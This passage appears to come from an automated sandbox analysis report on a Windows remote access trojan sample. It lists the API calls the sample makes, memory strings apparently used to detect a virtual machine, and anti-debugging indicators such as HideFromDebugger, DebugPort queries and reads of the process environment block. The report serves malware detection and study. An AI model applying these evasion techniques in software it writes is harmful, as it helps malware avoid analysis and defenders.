                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,4_2_1000140B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040F151 GetSystemInfo,wsprintfA,0_2_0040F151
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWdWndClass
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:$
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(-}%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWpF
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000677000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024A7137 rdtsc 0_2_024A7137
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024BE207 LdrInitializeThunk,0_2_024BE207
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040FB6E LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0040FB6E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022DB23D mov eax, dword ptr fs:[00000030h] 0_2_022DB23D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h] 0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h] 0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h] 0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h] 0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C9218 mov ecx, dword ptr fs:[00000030h] 0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022CD26E mov eax, dword ptr fs:[00000030h] 0_2_022CD26E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A727B mov eax, dword ptr fs:[00000030h] 0_2_022A727B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C424E mov eax, dword ptr fs:[00000030h] 0_2_022C424E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C424E mov ecx, dword ptr fs:[00000030h] 0_2_022C424E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D4258 mov eax, dword ptr fs:[00000030h] 0_2_022D4258
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AC255 mov eax, dword ptr fs:[00000030h] 0_2_022AC255
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AC255 mov eax, dword ptr fs:[00000030h] 0_2_022AC255
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF2A2 mov eax, dword ptr fs:[00000030h] 0_2_022BF2A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF2A2 mov ecx, dword ptr fs:[00000030h] 0_2_022BF2A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov ecx, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h] 0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B12BA mov eax, dword ptr fs:[00000030h] 0_2_022B12BA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B12BA mov eax, dword ptr fs:[00000030h] 0_2_022B12BA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0228C2BE mov ecx, dword ptr fs:[00000030h] 0_2_0228C2BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A328C mov eax, dword ptr fs:[00000030h] 0_2_022A328C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AC29B mov eax, dword ptr fs:[00000030h] 0_2_022AC29B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AC29B mov eax, dword ptr fs:[00000030h] 0_2_022AC29B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AC29B mov ecx, dword ptr fs:[00000030h] 0_2_022AC29B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C3294 mov eax, dword ptr fs:[00000030h] 0_2_022C3294
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C3294 mov eax, dword ptr fs:[00000030h] 0_2_022C3294
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C3294 mov eax, dword ptr fs:[00000030h] 0_2_022C3294
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D62C9 mov eax, dword ptr fs:[00000030h] 0_2_022D62C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229E2DE mov eax, dword ptr fs:[00000030h] 0_2_0229E2DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229E2DE mov eax, dword ptr fs:[00000030h] 0_2_0229E2DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229E2DE mov eax, dword ptr fs:[00000030h] 0_2_0229E2DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022812DF mov eax, dword ptr fs:[00000030h] 0_2_022812DF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022812DF mov eax, dword ptr fs:[00000030h] 0_2_022812DF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022812DF mov eax, dword ptr fs:[00000030h] 0_2_022812DF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B4321 mov eax, dword ptr fs:[00000030h] 0_2_022B4321
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B4321 mov eax, dword ptr fs:[00000030h] 0_2_022B4321
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0228531A mov eax, dword ptr fs:[00000030h] 0_2_0228531A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0228531A mov ecx, dword ptr fs:[00000030h] 0_2_0228531A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C331F mov eax, dword ptr fs:[00000030h] 0_2_022C331F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A736E mov eax, dword ptr fs:[00000030h] 0_2_022A736E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A736E mov eax, dword ptr fs:[00000030h] 0_2_022A736E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229D37E mov eax, dword ptr fs:[00000030h] 0_2_0229D37E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229D37E mov ecx, dword ptr fs:[00000030h] 0_2_0229D37E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229D37E mov eax, dword ptr fs:[00000030h] 0_2_0229D37E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF34E mov eax, dword ptr fs:[00000030h] 0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF34E mov eax, dword ptr fs:[00000030h] 0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF34E mov eax, dword ptr fs:[00000030h] 0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF34E mov ecx, dword ptr fs:[00000030h] 0_2_022BF34E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h] 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB mov ecx, dword ptr fs:[00000030h] 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h] 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h] 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h] 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB mov eax, dword ptr fs:[00000030h] 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D43A7 mov eax, dword ptr fs:[00000030h] 0_2_022D43A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022DB3A6 mov eax, dword ptr fs:[00000030h] 0_2_022DB3A6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022DE3BE mov ecx, dword ptr fs:[00000030h] 0_2_022DE3BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C439E mov eax, dword ptr fs:[00000030h] 0_2_022C439E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C439E mov ecx, dword ptr fs:[00000030h] 0_2_022C439E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022E03EE mov eax, dword ptr fs:[00000030h] 0_2_022E03EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022E03EE mov eax, dword ptr fs:[00000030h] 0_2_022E03EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022CD3EE mov eax, dword ptr fs:[00000030h] 0_2_022CD3EE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022DF3FB mov eax, dword ptr fs:[00000030h] 0_2_022DF3FB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02281021 mov eax, dword ptr fs:[00000030h] 0_2_02281021
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D7002 mov eax, dword ptr fs:[00000030h] 0_2_022D7002
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D7002 mov eax, dword ptr fs:[00000030h] 0_2_022D7002
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C1019 mov eax, dword ptr fs:[00000030h] 0_2_022C1019
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02280015 mov eax, dword ptr fs:[00000030h] 0_2_02280015
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022CB06E mov eax, dword ptr fs:[00000030h] 0_2_022CB06E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0228506F mov esi, dword ptr fs:[00000030h] 0_2_0228506F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C107F mov eax, dword ptr fs:[00000030h] 0_2_022C107F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C004E mov eax, dword ptr fs:[00000030h] 0_2_022C004E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229F044 mov eax, dword ptr fs:[00000030h] 0_2_0229F044
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229F044 mov eax, dword ptr fs:[00000030h] 0_2_0229F044
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229F044 mov eax, dword ptr fs:[00000030h] 0_2_0229F044
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022800AE mov eax, dword ptr fs:[00000030h] 0_2_022800AE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022800AE mov eax, dword ptr fs:[00000030h] 0_2_022800AE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D60A7 mov eax, dword ptr fs:[00000030h] 0_2_022D60A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D60A7 mov eax, dword ptr fs:[00000030h] 0_2_022D60A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D60A7 mov eax, dword ptr fs:[00000030h] 0_2_022D60A7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022C60BE mov ecx, dword ptr fs:[00000030h] 0_2_022C60BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D4088 mov eax, dword ptr fs:[00000030h] 0_2_022D4088
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D4088 mov eax, dword ptr fs:[00000030h] 0_2_022D4088
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D4088 mov eax, dword ptr fs:[00000030h] 0_2_022D4088
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF09C mov eax, dword ptr fs:[00000030h] 0_2_022BF09C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BF09C mov ecx, dword ptr fs:[00000030h] 0_2_022BF09C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02280094 mov eax, dword ptr fs:[00000030h] 0_2_02280094
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02280094 mov eax, dword ptr fs:[00000030h] 0_2_02280094
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B30FC mov eax, dword ptr fs:[00000030h] 0_2_022B30FC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B30FC mov eax, dword ptr fs:[00000030h] 0_2_022B30FC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AB0D5 mov ecx, dword ptr fs:[00000030h] 0_2_022AB0D5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022AB0D5 mov eax, dword ptr fs:[00000030h] 0_2_022AB0D5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B111E mov eax, dword ptr fs:[00000030h] 0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B111E mov eax, dword ptr fs:[00000030h] 0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B111E mov eax, dword ptr fs:[00000030h] 0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B111E mov eax, dword ptr fs:[00000030h] 0_2_022B111E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022D6115 mov eax, dword ptr fs:[00000030h] 0_2_022D6115
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229D16F mov eax, dword ptr fs:[00000030h] 0_2_0229D16F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0229D16F mov eax, dword ptr fs:[00000030h] 0_2_0229D16F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0229D16F mov eax, dword ptr fs:[00000030h]0_2_0229D16F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov eax, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CB162 mov ecx, dword ptr fs:[00000030h]0_2_022CB162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D61EF mov eax, dword ptr fs:[00000030h]0_2_022D61EF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC1ED mov eax, dword ptr fs:[00000030h]0_2_022AC1ED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC63D mov eax, dword ptr fs:[00000030h]0_2_022CC63D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C60B mov eax, dword ptr fs:[00000030h]0_2_0228C60B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C60B mov ecx, dword ptr fs:[00000030h]0_2_0228C60B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0228C60B mov eax, dword ptr fs:[00000030h]0_2_0228C60B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C461E mov eax, dword ptr fs:[00000030h]0_2_022C461E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C461E mov ecx, dword ptr fs:[00000030h]0_2_022C461E
